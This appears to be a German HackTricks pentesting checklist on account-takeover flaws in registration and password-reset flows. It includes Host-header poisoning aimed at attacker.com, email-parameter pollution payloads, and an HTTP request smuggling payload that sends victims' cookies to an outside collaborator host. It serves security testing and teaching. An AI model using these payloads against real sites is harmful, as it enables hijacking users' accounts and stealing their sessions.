Registrierung & Übernahmeanfälligkeiten

Reading time: 7 minutes

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks

Registrierung Übernahme

Doppelte Registrierung

  • Versuchen Sie, einen bestehenden Benutzernamen zu generieren
  • Überprüfen Sie verschiedene E-Mails:
  • Großbuchstaben
  • +1@
  • fügen Sie einen Punkt in der E-Mail hinzu
  • Sonderzeichen im E-Mail-Namen (%00, %09, %20)
  • Setzen Sie schwarze Zeichen nach der E-Mail: test@test.com a
  • victim@gmail.com@attacker.com
  • victim@attacker.com@gmail.com

Benutzernamen Enumeration

Überprüfen Sie, ob Sie herausfinden können, ob ein Benutzername bereits in der Anwendung registriert ist.

Passwort-Richtlinie

Beim Erstellen eines Benutzers überprüfen Sie die Passwort-Richtlinie (überprüfen Sie, ob Sie schwache Passwörter verwenden können).
In diesem Fall können Sie versuchen, Anmeldeinformationen zu bruteforcen.

SQL-Injection

Überprüfen Sie diese Seite , um zu lernen, wie man Kontoübernahmen versucht oder Informationen über SQL-Injections in Registrierungsformularen extrahiert.

Oauth Übernahmen

OAuth to Account takeover

SAML-Anfälligkeiten

SAML Attacks

E-Mail ändern

Wenn registriert, versuchen Sie, die E-Mail zu ändern und überprüfen Sie, ob diese Änderung korrekt validiert wird oder ob Sie sie auf beliebige E-Mails ändern können.

Weitere Überprüfungen

  • Überprüfen Sie, ob Sie wegwerfbare E-Mails verwenden können
  • Lange Passwörter (>200) führen zu DoS
  • Überprüfen Sie die Ratenlimits bei der Kontoerstellung
  • Verwenden Sie username@burp_collab.net und analysieren Sie den Callback

Passwortzurücksetzungsübernahme

Passwortzurücksetzung Token-Leck über Referrer

  1. Fordern Sie die Passwortzurücksetzung an Ihre E-Mail-Adresse an
  2. Klicken Sie auf den Link zur Passwortzurücksetzung
  3. Ändern Sie das Passwort nicht
  4. Klicken Sie auf beliebige 3rd-Party-Websites (z.B.: Facebook, Twitter)
  5. Abfangen Sie die Anfrage im Burp Suite Proxy
  6. Überprüfen Sie, ob der Referer-Header das Passwortzurücksetzungstoken leckt.

Passwortzurücksetzung Vergiftung

  1. Fangen Sie die Passwortzurücksetzungsanfrage in Burp Suite ab
  2. Fügen Sie die folgenden Header in Burp Suite hinzu oder bearbeiten Sie sie: Host: attacker.com, X-Forwarded-Host: attacker.com
  3. Leiten Sie die Anfrage mit dem modifizierten Header weiter
    http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
  4. Suchen Sie nach einer URL zur Passwortzurücksetzung basierend auf dem Host-Header wie: https://attacker.com/reset-password.php?token=TOKEN

Passwortzurücksetzung über E-Mail-Parameter

bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR on API Parameters

  1. Angreifer müssen sich mit ihrem Konto anmelden und zur Funktion Passwort ändern gehen.
  2. Starten Sie Burp Suite und intercepten Sie die Anfrage.
  3. Senden Sie sie an den Repeater-Tab und bearbeiten Sie die Parameter: Benutzer-ID/E-Mail
    powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Weak Password Reset Token

Das Passwort-Reset-Token sollte zufällig generiert und jedes Mal einzigartig sein.
Versuchen Sie zu bestimmen, ob das Token abläuft oder ob es immer dasselbe ist. In einigen Fällen ist der Generierungsalgorithmus schwach und kann erraten werden. Die folgenden Variablen könnten vom Algorithmus verwendet werden.

  • Zeitstempel
  • Benutzer-ID
  • E-Mail des Benutzers
  • Vorname und Nachname
  • Geburtsdatum
  • Kryptographie
  • Nur Zahlen
  • Kleine Token-Sequenz (Zeichen zwischen [A-Z,a-z,0-9])
  • Token-Wiederverwendung
  • Ablaufdatum des Tokens

Leaking Password Reset Token

  1. Lösen Sie eine Passwort-Reset-Anfrage über die API/UI für eine bestimmte E-Mail aus, z.B.: test@mail.com
  2. Überprüfen Sie die Serverantwort und suchen Sie nach resetToken
  3. Verwenden Sie dann das Token in einer URL wie https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Via Username Collision

  1. Registrieren Sie sich im System mit einem Benutzernamen, der identisch mit dem Benutzernamen des Opfers ist, jedoch mit Leerzeichen vor und/oder nach dem Benutzernamen. z.B.: "admin "
  2. Fordern Sie einen Passwort-Reset mit Ihrem böswilligen Benutzernamen an.
  3. Verwenden Sie das Token, das an Ihre E-Mail gesendet wurde, und setzen Sie das Passwort des Opfers zurück.
  4. Melden Sie sich mit dem neuen Passwort beim Konto des Opfers an.

Die Plattform CTFd war anfällig für diesen Angriff.
Siehe: CVE-2020-7245

Account Takeover Via Cross Site Scripting

  1. Finden Sie ein XSS innerhalb der Anwendung oder einer Subdomain, wenn die Cookies auf die übergeordnete Domain beschränkt sind: *.domain.com
  2. Leaken Sie das aktuelle Sessions-Cookie
  3. Authentifizieren Sie sich als der Benutzer mit dem Cookie

Account Takeover Via HTTP Request Smuggling

1. Verwenden Sie smuggler, um den Typ des HTTP Request Smuggling (CL, TE, CL.TE) zu erkennen
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Erstellen Sie eine Anfrage, die POST / HTTP/1.1 mit den folgenden Daten überschreibt:
GET http://something.burpcollaborator.net HTTP/1.1 X: mit dem Ziel, die Opfer zu burpcollab weiterzuleiten und ihre Cookies zu stehlen
3. Die endgültige Anfrage könnte wie folgt aussehen

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone-Berichte, die diesen Fehler ausnutzen
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666

Kontoübernahme über CSRF

  1. Erstellen Sie ein Payload für das CSRF, z.B.: „HTML-Formular mit automatischer Übermittlung für eine Passwortänderung“
  2. Senden Sie das Payload

Kontoübernahme über JWT

JSON Web Token könnte verwendet werden, um einen Benutzer zu authentifizieren.

  • Bearbeiten Sie das JWT mit einer anderen Benutzer-ID / E-Mail
  • Überprüfen Sie die schwache JWT-Signatur

JWT Vulnerabilities (Json Web Tokens)

Referenzen

tip

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Lernen & üben Sie Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Unterstützen Sie HackTricks